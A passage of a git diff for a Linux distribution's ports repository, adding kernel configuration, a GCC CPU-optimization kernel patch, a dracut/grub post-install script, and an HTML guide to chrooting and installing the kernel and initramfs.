+CONFIG_XZ_DEC_POWERPC=y
+CONFIG_XZ_DEC_IA64=y
+CONFIG_XZ_DEC_ARM=y
+CONFIG_XZ_DEC_ARMTHUMB=y
+CONFIG_XZ_DEC_SPARC=y
+CONFIG_XZ_DEC_BCJ=y
+# CONFIG_XZ_DEC_TEST is not set
+CONFIG_DECOMPRESS_GZIP=y
+CONFIG_DECOMPRESS_BZIP2=y
+CONFIG_DECOMPRESS_LZMA=y
+CONFIG_DECOMPRESS_XZ=y
+CONFIG_DECOMPRESS_LZO=y
+CONFIG_DECOMPRESS_LZ4=y
+CONFIG_GENERIC_ALLOCATOR=y
+CONFIG_TEXTSEARCH=y
+CONFIG_TEXTSEARCH_KMP=y
+CONFIG_TEXTSEARCH_BM=y
+CONFIG_TEXTSEARCH_FSM=y
+CONFIG_INTERVAL_TREE=y
+CONFIG_ASSOCIATIVE_ARRAY=y
+CONFIG_HAS_IOMEM=y
+CONFIG_HAS_IOPORT_MAP=y
+CONFIG_HAS_DMA=y
+CONFIG_CHECK_SIGNATURE=y
+CONFIG_CPU_RMAP=y
+CONFIG_DQL=y
+CONFIG_GLOB=y
+# CONFIG_GLOB_SELFTEST is not set
+CONFIG_NLATTR=y
+CONFIG_CLZ_TAB=y
+# CONFIG_CORDIC is not set
+# CONFIG_DDR is not set
+CONFIG_IRQ_POLL=y
+CONFIG_MPILIB=y
+CONFIG_OID_REGISTRY=y
+CONFIG_UCS2_STRING=y
+CONFIG_FONT_SUPPORT=y
+# CONFIG_FONTS is not set
+CONFIG_FONT_8x8=y
+CONFIG_FONT_8x16=y
+# CONFIG_SG_SPLIT is not set
+CONFIG_SG_POOL=y
+CONFIG_ARCH_HAS_SG_CHAIN=y
+CONFIG_ARCH_HAS_PMEM_API=y
+CONFIG_ARCH_HAS_MMIO_FLUSH=y
+CONFIG_SBITMAP=y
diff --git a/linux/ports/linux-gnu/cpu_optimizations.patch b/linux/ports/linux-gnu/cpu_optimizations.patch
new file mode 100644
index 0000000..5df5066
--- /dev/null
+++ b/linux/ports/linux-gnu/cpu_optimizations.patch
@@ -0,0 +1,533 @@
+WARNING
+This patch works with gcc versions 4.9+ and with kernel version 3.15+ and should
+NOT be applied when compiling on older versions of gcc due to key name changes
+of the march flags introduced with the version 4.9 release of gcc.[1]
+
+Use the older version of this patch hosted on the same github for older
+versions of gcc.
+
+FEATURES
+This patch adds additional CPU options to the Linux kernel accessible under:
+ Processor type and features  --->
+  Processor family --->
+
+The expanded microarchitectures include:
+* AMD Improved K8-family
+* AMD K10-family
+* AMD Family 10h (Barcelona)
+* AMD Family 14h (Bobcat)
+* AMD Family 16h (Jaguar)
+* AMD Family 15h (Bulldozer)
+* AMD Family 15h (Piledriver)
+* AMD Family 15h (Steamroller)
+* AMD Family 15h (Excavator)
+* AMD Family 17h (Zen)
+* Intel Silvermont low-power processors
+* Intel 1st Gen Core i3/i5/i7 (Nehalem)
+* Intel 1.5 Gen Core i3/i5/i7 (Westmere)
+* Intel 2nd Gen Core i3/i5/i7 (Sandybridge)
+* Intel 3rd Gen Core i3/i5/i7 (Ivybridge)
+* Intel 4th Gen Core i3/i5/i7 (Haswell)
+* Intel 5th Gen Core i3/i5/i7 (Broadwell)
+* Intel 6th Gen Core i3/i5.i7 (Skylake)
+
+It also offers to compile passing the 'native' option which, "selects the CPU
+to generate code for at compilation time by determining the processor type of
+the compiling machine. Using -march=native enables all instruction subsets
+supported by the local machine and will produce code optimized for the local
+machine under the constraints of the selected instruction set."[3]
+
+MINOR NOTES
+This patch also changes 'atom' to 'bonnell' in accordance with the gcc v4.9
+changes. Note that upstream is using the deprecated 'match=atom' flags when I
+believe it should use the newer 'march=bonnell' flag for atom processors.[2]
+
+It is not recommended to compile on Atom-CPUs with the 'native' option.[4] The
+recommendation is to use the 'atom' option instead.
+
+BENEFITS
+Small but real speed increases are measurable using a make endpoint comparing
+a generic kernel to one built with one of the respective microarchs.
+
+See the following experimental evidence supporting this statement:
+https://github.com/graysky2/kernel_gcc_patch
+
+REQUIREMENTS
+linux version >=3.15 && <4.13
+gcc version >=4.9
+
+ACKNOWLEDGMENTS
+This patch builds on the seminal work by Jeroen.[5]
+
+REFERENCES
+1. https://gcc.gnu.org/gcc-4.9/changes.html
+2. https://bugzilla.kernel.org/show_bug.cgi?id=77461
+3. https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html
+4. https://github.com/graysky2/kernel_gcc_patch/issues/15
+5. http://www.linuxforge.net/docs/linux/linux-gcc.php
+
+--- a/arch/x86/include/asm/module.h	2016-12-11 14:17:54.000000000 -0500
++++ b/arch/x86/include/asm/module.h	2017-01-06 20:44:36.602227264 -0500
+@@ -15,6 +15,24 @@
+ #define MODULE_PROC_FAMILY "586MMX "
+ #elif defined CONFIG_MCORE2
+ #define MODULE_PROC_FAMILY "CORE2 "
++#elif defined CONFIG_MNATIVE
++#define MODULE_PROC_FAMILY "NATIVE "
++#elif defined CONFIG_MNEHALEM
++#define MODULE_PROC_FAMILY "NEHALEM "
++#elif defined CONFIG_MWESTMERE
++#define MODULE_PROC_FAMILY "WESTMERE "
++#elif defined CONFIG_MSILVERMONT
++#define MODULE_PROC_FAMILY "SILVERMONT "
++#elif defined CONFIG_MSANDYBRIDGE
++#define MODULE_PROC_FAMILY "SANDYBRIDGE "
++#elif defined CONFIG_MIVYBRIDGE
++#define MODULE_PROC_FAMILY "IVYBRIDGE "
++#elif defined CONFIG_MHASWELL
++#define MODULE_PROC_FAMILY "HASWELL "
++#elif defined CONFIG_MBROADWELL
++#define MODULE_PROC_FAMILY "BROADWELL "
++#elif defined CONFIG_MSKYLAKE
++#define MODULE_PROC_FAMILY "SKYLAKE "
+ #elif defined CONFIG_MATOM
+ #define MODULE_PROC_FAMILY "ATOM "
+ #elif defined CONFIG_M686
+@@ -33,6 +51,26 @@
+ #define MODULE_PROC_FAMILY "K7 "
+ #elif defined CONFIG_MK8
+ #define MODULE_PROC_FAMILY "K8 "
++#elif defined CONFIG_MK8SSE3
++#define MODULE_PROC_FAMILY "K8SSE3 "
++#elif defined CONFIG_MK10
++#define MODULE_PROC_FAMILY "K10 "
++#elif defined CONFIG_MBARCELONA
++#define MODULE_PROC_FAMILY "BARCELONA "
++#elif defined CONFIG_MBOBCAT
++#define MODULE_PROC_FAMILY "BOBCAT "
++#elif defined CONFIG_MBULLDOZER
++#define MODULE_PROC_FAMILY "BULLDOZER "
++#elif defined CONFIG_MPILEDRIVER
++#define MODULE_PROC_FAMILY "PILEDRIVER "
++#elif defined CONFIG_MSTEAMROLLER
++#define MODULE_PROC_FAMILY "STEAMROLLER "
++#elif defined CONFIG_MJAGUAR
++#define MODULE_PROC_FAMILY "JAGUAR "
++#elif defined CONFIG_MEXCAVATOR
++#define MODULE_PROC_FAMILY "EXCAVATOR "
++#elif defined CONFIG_MZEN
++#define MODULE_PROC_FAMILY "ZEN "
+ #elif defined CONFIG_MELAN
+ #define MODULE_PROC_FAMILY "ELAN "
+ #elif defined CONFIG_MCRUSOE
+--- a/arch/x86/Kconfig.cpu	2016-12-11 14:17:54.000000000 -0500
++++ b/arch/x86/Kconfig.cpu	2017-01-06 20:46:14.004109597 -0500
+@@ -115,6 +115,7 @@ config MPENTIUMM
+ config MPENTIUM4
+ 	bool "Pentium-4/Celeron(P4-based)/Pentium-4 M/older Xeon"
+ 	depends on X86_32
++	select X86_P6_NOP
+ 	---help---
+ 	  Select this for Intel Pentium 4 chips.  This includes the
+ 	  Pentium 4, Pentium D, P4-based Celeron and Xeon, and
+@@ -147,9 +148,8 @@ config MPENTIUM4
+ 		-Paxville
+ 		-Dempsey
+ 
+-
+ config MK6
+-	bool "K6/K6-II/K6-III"
++	bool "AMD K6/K6-II/K6-III"
+ 	depends on X86_32
+ 	---help---
+ 	  Select this for an AMD K6-family processor.  Enables use of
+@@ -157,7 +157,7 @@ config MK6
+ 	  flags to GCC.
+ 
+ config MK7
+-	bool "Athlon/Duron/K7"
++	bool "AMD Athlon/Duron/K7"
+ 	depends on X86_32
+ 	---help---
+ 	  Select this for an AMD Athlon K7-family processor.  Enables use of
+@@ -165,12 +165,83 @@ config MK7
+ 	  flags to GCC.
+ 
+ config MK8
+-	bool "Opteron/Athlon64/Hammer/K8"
++	bool "AMD Opteron/Athlon64/Hammer/K8"
+ 	---help---
+ 	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
+ 	  Enables use of some extended instructions, and passes appropriate
+ 	  optimization flags to GCC.
+ 
++config MK8SSE3
++	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
++	---help---
++	  Select this for improved AMD Opteron or Athlon64 Hammer-family processors.
++	  Enables use of some extended instructions, and passes appropriate
++	  optimization flags to GCC.
++
++config MK10
++	bool "AMD 61xx/7x50/PhenomX3/X4/II/K10"
++	---help---
++	  Select this for an AMD 61xx Eight-Core Magny-Cours, Athlon X2 7x50,
++		Phenom X3/X4/II, Athlon II X2/X3/X4, or Turion II-family processor.
++	  Enables use of some extended instructions, and passes appropriate
++	  optimization flags to GCC.
++
++config MBARCELONA
++	bool "AMD Barcelona"
++	---help---
++	  Select this for AMD Family 10h Barcelona processors.
++
++	  Enables -march=barcelona
++
++config MBOBCAT
++	bool "AMD Bobcat"
++	---help---
++	  Select this for AMD Family 14h Bobcat processors.
++
++	  Enables -march=btver1
++
++config MJAGUAR
++	bool "AMD Jaguar"
++	---help---
++	  Select this for AMD Family 16h Jaguar processors.
++
++	  Enables -march=btver2
++
++config MBULLDOZER
++	bool "AMD Bulldozer"
++	---help---
++	  Select this for AMD Family 15h Bulldozer processors.
++
++	  Enables -march=bdver1
++
++config MPILEDRIVER
++	bool "AMD Piledriver"
++	---help---
++	  Select this for AMD Family 15h Piledriver processors.
++
++	  Enables -march=bdver2
++
++config MSTEAMROLLER
++	bool "AMD Steamroller"
++	---help---
++	  Select this for AMD Family 15h Steamroller processors.
++
++	  Enables -march=bdver3
++
++config MEXCAVATOR
++	bool "AMD Excavator"
++	---help---
++	  Select this for AMD Family 15h Excavator processors.
++
++	  Enables -march=bdver4
++
++config MZEN
++	bool "AMD Zen"
++	---help---
++	  Select this for AMD Family 17h Zen processors.
++
++	  Enables -march=znver1
++
+ config MCRUSOE
+ 	bool "Crusoe"
+ 	depends on X86_32
+@@ -252,6 +323,7 @@ config MVIAC7
+ 
+ config MPSC
+ 	bool "Intel P4 / older Netburst based Xeon"
++	select X86_P6_NOP
+ 	depends on X86_64
+ 	---help---
+ 	  Optimize for Intel Pentium 4, Pentium D and older Nocona/Dempsey
+@@ -261,8 +333,19 @@ config MPSC
+ 	  using the cpu family field
+ 	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
+ 
++config MATOM
++	bool "Intel Atom"
++	select X86_P6_NOP
++	---help---
++
++	  Select this for the Intel Atom platform. Intel Atom CPUs have an
++	  in-order pipelining architecture and thus can benefit from
++	  accordingly optimized code. Use a recent GCC with specific Atom
++	  support in order to fully benefit from selecting this option.
++
+ config MCORE2
+-	bool "Core 2/newer Xeon"
++	bool "Intel Core 2"
++	select X86_P6_NOP
+ 	---help---
+ 
+ 	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
+@@ -270,14 +353,79 @@ config MCORE2
+ 	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
+ 	  (not a typo)
+ 
+-config MATOM
+-	bool "Intel Atom"
++	  Enables -march=core2
++
++config MNEHALEM
++	bool "Intel Nehalem"
++	select X86_P6_NOP
+ 	---help---
+ 
+-	  Select this for the Intel Atom platform. Intel Atom CPUs have an
+-	  in-order pipelining architecture and thus can benefit from
+-	  accordingly optimized code. Use a recent GCC with specific Atom
+-	  support in order to fully benefit from selecting this option.
++	  Select this for 1st Gen Core processors in the Nehalem family.
++
++	  Enables -march=nehalem
++
++config MWESTMERE
++	bool "Intel Westmere"
++	select X86_P6_NOP
++	---help---
++
++	  Select this for the Intel Westmere formerly Nehalem-C family.
++
++	  Enables -march=westmere
++
++config MSILVERMONT
++	bool "Intel Silvermont"
++	select X86_P6_NOP
++	---help---
++
++	  Select this for the Intel Silvermont platform.
++
++	  Enables -march=silvermont
++
++config MSANDYBRIDGE
++	bool "Intel Sandy Bridge"
++	select X86_P6_NOP
++	---help---
++
++	  Select this for 2nd Gen Core processors in the Sandy Bridge family.
++
++	  Enables -march=sandybridge
++
++config MIVYBRIDGE
++	bool "Intel Ivy Bridge"
++	select X86_P6_NOP
++	---help---
++
++	  Select this for 3rd Gen Core processors in the Ivy Bridge family.
++
++	  Enables -march=ivybridge
++
++config MHASWELL
++	bool "Intel Haswell"
++	select X86_P6_NOP
++	---help---
++
++	  Select this for 4th Gen Core processors in the Haswell family.
++
++	  Enables -march=haswell
++
++config MBROADWELL
++	bool "Intel Broadwell"
++	select X86_P6_NOP
++	---help---
++
++	  Select this for 5th Gen Core processors in the Broadwell family.
++
++	  Enables -march=broadwell
++
++config MSKYLAKE
++	bool "Intel Skylake"
++	select X86_P6_NOP
++	---help---
++
++	  Select this for 6th Gen Core processors in the Skylake family.
++
++	  Enables -march=skylake
+ 
+ config GENERIC_CPU
+ 	bool "Generic-x86-64"
+@@ -286,6 +434,19 @@ config GENERIC_CPU
+ 	  Generic x86-64 CPU.
+ 	  Run equally well on all x86-64 CPUs.
+ 
++config MNATIVE
++ bool "Native optimizations autodetected by GCC"
++ ---help---
++
++   GCC 4.2 and above support -march=native, which automatically detects
++   the optimum settings to use based on your processor. -march=native 
++   also detects and applies additional settings beyond -march specific
++   to your CPU, (eg. -msse4). Unless you have a specific reason not to
++   (e.g. distcc cross-compiling), you should probably be using
++   -march=native rather than anything listed below.
++
++   Enables -march=native
++
+ endchoice
+ 
+ config X86_GENERIC
+@@ -310,7 +471,7 @@ config X86_INTERNODE_CACHE_SHIFT
+ config X86_L1_CACHE_SHIFT
+ 	int
+ 	default "7" if MPENTIUM4 || MPSC
+-	default "6" if MK7 || MK8 || MPENTIUMM || MCORE2 || MATOM || MVIAC7 || X86_GENERIC || GENERIC_CPU
++	default "6" if MK7 || MK8 || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MJAGUAR || MPENTIUMM || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MNATIVE || MATOM || MVIAC7 || X86_GENERIC || GENERIC_CPU
+ 	default "4" if MELAN || M486 || MGEODEGX1
+ 	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
+ 
+@@ -341,45 +502,46 @@ config X86_ALIGNMENT_16
+ 
+ config X86_INTEL_USERCOPY
+ 	def_bool y
+-	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
++	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK8SSE3 || MK7 || MEFFICEON || MCORE2 || MK10 || MBARCELONA || MNEHALEM || MWESTMERE || MSILVERMONT || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MNATIVE
+ 
+ config X86_USE_PPRO_CHECKSUM
+ 	def_bool y
+-	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
++	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MK10 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MK8SSE3 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MATOM || MNATIVE
+ 
+ config X86_USE_3DNOW
+ 	def_bool y
+ 	depends on (MCYRIXIII || MK7 || MGEODE_LX) && !UML
+ 
+-#
+-# P6_NOPs are a relatively minor optimization that require a family >=
+-# 6 processor, except that it is broken on certain VIA chips.
+-# Furthermore, AMD chips prefer a totally different sequence of NOPs
+-# (which work on all CPUs).  In addition, it looks like Virtual PC
+-# does not understand them.
+-#
+-# As a result, disallow these if we're not compiling for X86_64 (these
+-# NOPs do work on all x86-64 capable chips); the list of processors in
+-# the right-hand clause are the cores that benefit from this optimization.
+-#
+ config X86_P6_NOP
+-	def_bool y
+-	depends on X86_64
+-	depends on (MCORE2 || MPENTIUM4 || MPSC)
++	default n
++	bool "Support for P6_NOPs on Intel chips"
++	depends on (MCORE2 || MPENTIUM4 || MPSC || MATOM || MNEHALEM || MWESTMERE || MSILVERMONT  || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MNATIVE)
++	---help---
++	P6_NOPs are a relatively minor optimization that require a family >=
++	6 processor, except that it is broken on certain VIA chips.
++	Furthermore, AMD chips prefer a totally different sequence of NOPs
++	(which work on all CPUs).  In addition, it looks like Virtual PC
++	does not understand them.
++
++	As a result, disallow these if we're not compiling for X86_64 (these
++	NOPs do work on all x86-64 capable chips); the list of processors in
++	the right-hand clause are the cores that benefit from this optimization.
++
++	Say Y if you have Intel CPU newer than Pentium Pro, N otherwise.
+ 
+ config X86_TSC
+ 	def_bool y
+-	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
++	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MK8SSE3 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MNATIVE || MATOM) || X86_64
+ 
+ config X86_CMPXCHG64
+ 	def_bool y
+-	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MATOM
++	depends on X86_PAE || X86_64 || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MATOM || MNATIVE
+ 
+ # this should be set for all -march=.. options where the compiler
+ # generates cmov.
+ config X86_CMOV
+ 	def_bool y
+-	depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX)
++	depends on (MK8 || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MJAGUAR || MK7 || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MNATIVE || MATOM || MGEODE_LX)
+ 
+ config X86_MINIMUM_CPU_FAMILY
+ 	int
+--- a/arch/x86/Makefile	2016-12-11 14:17:54.000000000 -0500
++++ b/arch/x86/Makefile	2017-01-06 20:44:36.603227283 -0500
+@@ -104,13 +104,40 @@ else
+ 	KBUILD_CFLAGS += $(call cc-option,-mskip-rax-setup)
+ 
+         # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
++        cflags-$(CONFIG_MNATIVE) += $(call cc-option,-march=native)
+         cflags-$(CONFIG_MK8) += $(call cc-option,-march=k8)
++        cflags-$(CONFIG_MK8SSE3) += $(call cc-option,-march=k8-sse3,-mtune=k8)
++        cflags-$(CONFIG_MK10) += $(call cc-option,-march=amdfam10)
++        cflags-$(CONFIG_MBARCELONA) += $(call cc-option,-march=barcelona)
++        cflags-$(CONFIG_MBOBCAT) += $(call cc-option,-march=btver1)
++        cflags-$(CONFIG_MJAGUAR) += $(call cc-option,-march=btver2)
++        cflags-$(CONFIG_MBULLDOZER) += $(call cc-option,-march=bdver1)
++        cflags-$(CONFIG_MPILEDRIVER) += $(call cc-option,-march=bdver2)
++        cflags-$(CONFIG_MSTEAMROLLER) += $(call cc-option,-march=bdver3)
++        cflags-$(CONFIG_MEXCAVATOR) += $(call cc-option,-march=bdver4)
++        cflags-$(CONFIG_MZEN) += $(call cc-option,-march=znver1)
+         cflags-$(CONFIG_MPSC) += $(call cc-option,-march=nocona)
+ 
+         cflags-$(CONFIG_MCORE2) += \
+-                $(call cc-option,-march=core2,$(call cc-option,-mtune=generic))
+-	cflags-$(CONFIG_MATOM) += $(call cc-option,-march=atom) \
+-		$(call cc-option,-mtune=atom,$(call cc-option,-mtune=generic))
++                $(call cc-option,-march=core2,$(call cc-option,-mtune=core2))
++        cflags-$(CONFIG_MNEHALEM) += \
++                $(call cc-option,-march=nehalem,$(call cc-option,-mtune=nehalem))
++        cflags-$(CONFIG_MWESTMERE) += \
++                $(call cc-option,-march=westmere,$(call cc-option,-mtune=westmere))
++        cflags-$(CONFIG_MSILVERMONT) += \
++                $(call cc-option,-march=silvermont,$(call cc-option,-mtune=silvermont))
++        cflags-$(CONFIG_MSANDYBRIDGE) += \
++                $(call cc-option,-march=sandybridge,$(call cc-option,-mtune=sandybridge))
++        cflags-$(CONFIG_MIVYBRIDGE) += \
++                $(call cc-option,-march=ivybridge,$(call cc-option,-mtune=ivybridge))
++        cflags-$(CONFIG_MHASWELL) += \
++                $(call cc-option,-march=haswell,$(call cc-option,-mtune=haswell))
++        cflags-$(CONFIG_MBROADWELL) += \
++                $(call cc-option,-march=broadwell,$(call cc-option,-mtune=broadwell))
++        cflags-$(CONFIG_MSKYLAKE) += \
++                $(call cc-option,-march=skylake,$(call cc-option,-mtune=skylake))
++        cflags-$(CONFIG_MATOM) += $(call cc-option,-march=bonnell) \
++                $(call cc-option,-mtune=bonnell,$(call cc-option,-mtune=generic))
+         cflags-$(CONFIG_GENERIC_CPU) += $(call cc-option,-mtune=generic)
+         KBUILD_CFLAGS += $(cflags-y)
+ 
+--- a/arch/x86/Makefile_32.cpu	2016-12-11 14:17:54.000000000 -0500
++++ b/arch/x86/Makefile_32.cpu	2017-01-06 20:44:36.603227283 -0500
+@@ -23,7 +23,18 @@ cflags-$(CONFIG_MK6)		+= -march=k6
+ # Please note, that patches that add -march=athlon-xp and friends are pointless.
+ # They make zero difference whatsosever to performance at this time.
+ cflags-$(CONFIG_MK7)		+= -march=athlon
++cflags-$(CONFIG_MNATIVE) += $(call cc-option,-march=native)
+ cflags-$(CONFIG_MK8)		+= $(call cc-option,-march=k8,-march=athlon)
++cflags-$(CONFIG_MK8SSE3)		+= $(call cc-option,-march=k8-sse3,-march=athlon)
++cflags-$(CONFIG_MK10)	+= $(call cc-option,-march=amdfam10,-march=athlon)
++cflags-$(CONFIG_MBARCELONA)	+= $(call cc-option,-march=barcelona,-march=athlon)
++cflags-$(CONFIG_MBOBCAT)	+= $(call cc-option,-march=btver1,-march=athlon)
++cflags-$(CONFIG_MJAGUAR)	+= $(call cc-option,-march=btver2,-march=athlon)
++cflags-$(CONFIG_MBULLDOZER)	+= $(call cc-option,-march=bdver1,-march=athlon)
++cflags-$(CONFIG_MPILEDRIVER)	+= $(call cc-option,-march=bdver2,-march=athlon)
++cflags-$(CONFIG_MSTEAMROLLER)	+= $(call cc-option,-march=bdver3,-march=athlon)
++cflags-$(CONFIG_MEXCAVATOR)	+= $(call cc-option,-march=bdver4,-march=athlon)
++cflags-$(CONFIG_MZEN)	+= $(call cc-option,-march=znver1,-march=athlon)
+ cflags-$(CONFIG_MCRUSOE)	+= -march=i686 $(align)-functions=0 $(align)-jumps=0 $(align)-loops=0
+ cflags-$(CONFIG_MEFFICEON)	+= -march=i686 $(call tune,pentium3) $(align)-functions=0 $(align)-jumps=0 $(align)-loops=0
+ cflags-$(CONFIG_MWINCHIPC6)	+= $(call cc-option,-march=winchip-c6,-march=i586)
+@@ -32,8 +43,16 @@ cflags-$(CONFIG_MCYRIXIII)	+= $(call cc-
+ cflags-$(CONFIG_MVIAC3_2)	+= $(call cc-option,-march=c3-2,-march=i686)
+ cflags-$(CONFIG_MVIAC7)		+= -march=i686
+ cflags-$(CONFIG_MCORE2)		+= -march=i686 $(call tune,core2)
+-cflags-$(CONFIG_MATOM)		+= $(call cc-option,-march=atom,$(call cc-option,-march=core2,-march=i686)) \
+-	$(call cc-option,-mtune=atom,$(call cc-option,-mtune=generic))
++cflags-$(CONFIG_MNEHALEM)	+= -march=i686 $(call tune,nehalem)
++cflags-$(CONFIG_MWESTMERE)	+= -march=i686 $(call tune,westmere)
++cflags-$(CONFIG_MSILVERMONT)	+= -march=i686 $(call tune,silvermont)
++cflags-$(CONFIG_MSANDYBRIDGE)	+= -march=i686 $(call tune,sandybridge)
++cflags-$(CONFIG_MIVYBRIDGE)	+= -march=i686 $(call tune,ivybridge)
++cflags-$(CONFIG_MHASWELL)	+= -march=i686 $(call tune,haswell)
++cflags-$(CONFIG_MBROADWELL)	+= -march=i686 $(call tune,broadwell)
++cflags-$(CONFIG_MSKYLAKE)	+= -march=i686 $(call tune,skylake)
++cflags-$(CONFIG_MATOM)		+= $(call cc-option,-march=bonnell,$(call cc-option,-march=core2,-march=i686)) \
++	$(call cc-option,-mtune=bonnell,$(call cc-option,-mtune=generic))
+ 
+ # AMD Elan support
+ cflags-$(CONFIG_MELAN)		+= -march=i486
diff --git a/linux/ports/linux-gnu/post-install b/linux/ports/linux-gnu/post-install
new file mode 100644
index 0000000..45690a4
--- /dev/null
+++ b/linux/ports/linux-gnu/post-install
@@ -0,0 +1,5 @@
+#!/bin/sh
+
+/usr/bin/dracut -f --kver 4.9.111-gnu
+
+/usr/sbin/grub-mkconfig -o /boot/grub/grub.cfg
diff --git a/linux/reboot.html b/linux/reboot.html
new file mode 100644
index 0000000..f8ab278
--- /dev/null
+++ b/linux/reboot.html
@@ -0,0 +1,232 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>1.3. Boot</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1>1.3. Boot</h1>
+
+        <p>Follow this instructions with active chroot,
+        first <a href="configure.html#chroot">mount partitions</a>
+        and before chroot mount follow file systems;</p>
+
+        <pre>
+        $ sudo mount --bind /dev $CHROOT/dev
+        $ sudo mount -vt devpts devpts $CHROOT/dev/pts
+        $ sudo mount -vt tmpfs shm $CHROOT/dev/shm
+        $ sudo mount -vt proc proc $CHROOT/proc
+        $ sudo mount -vt sysfs sysfs $CHROOT/sys
+        </pre>
+
+        <p>Now you can chroot;</p>
+
+        <pre>
+        $ sudo chroot $CHROOT /usr/bin/env -i \
+          HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+          PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+          /bin/bash --login
+        </pre>
+
+        <h2 id="linux">1.3.1. Kernel</h2>
+
+        <p>Install <a href="ports/linux-gnu">linux-gnu</a> port,
+        linux libre kernel is a true source based kernel that
+        respects your freedoms. Read <a href="linux.html">linux kernel</a> 
+        for more information.</p>
+
+	<p>Default crux configuration can be obtained from iso,
+	kernel port depend on <a href="reboot.html#dracut">dracut</a>, grub2
+	and grub2-efi. You don't need them to build with pkgmk, to install
+	boot related tools use prt-get;</p>
+
+	<pre>
+	$ prt-get depinst linux-gnu
+	</pre>
+
+        <p>If you don't have the port binary package build it;</p>
+
+        <pre>
+        # cd /usr/ports/machine-ports/linux-gnu
+        # pkgmk -d
+        </pre>
+
+        <p>Install kernel;</p>
+
+        <pre>
+        # pkgadd /usr/ports/packages/linux-gnu#4.9.86-2.pkg.tar.gz
+        </pre>
+
+        <h2 id="dracut">1.3.2. Dracut</h2>
+
+        <p>Install dracut;</p>
+
+        <pre>
+        # cd /usr/ports/machine-ports/dracut
+        # pkgmk -d
+        # pkgadd /usr/ports/packages/dracut#044-2.pkg.tar.gz
+        </pre>
+
+        <p>Review configuration file;</p>
+
+        <pre>
+        # PUT YOUR CONFIG IN separate files
+        # in /etc/dracut.conf.d named "<name>.conf"
+
+        # Equivalent to -H
+        hostonly="no"
+
+        # Mount / and /usr read-only by default.
+        ro_mnt="no"
+
+        # Equivalent to -m "module module module"
+        dracutmodules+="dash kernel-modules rootfs-block udev-rules usrmount base fs-lib shutdown"
+
+        # Equivalent to -a "module"
+        add_dracutmodules+="caps debug"
+
+        # Equivalent to -o "module"
+        #omit_dracutmodules+="systemd systemd-bootchart systemd-networkd systemd-initrd"
+
+        # SEE man dracut.conf(5) for options
+        </pre>
+
+        <p>Run dracut to create init ram filesystem for
+        port linux-blob kernel;</p>
+
+        <pre>
+        # dracut --kver 4.9.86-gnu
+        </pre>
+
+        <h2 id="grub">1.3.3. Grub</h2>
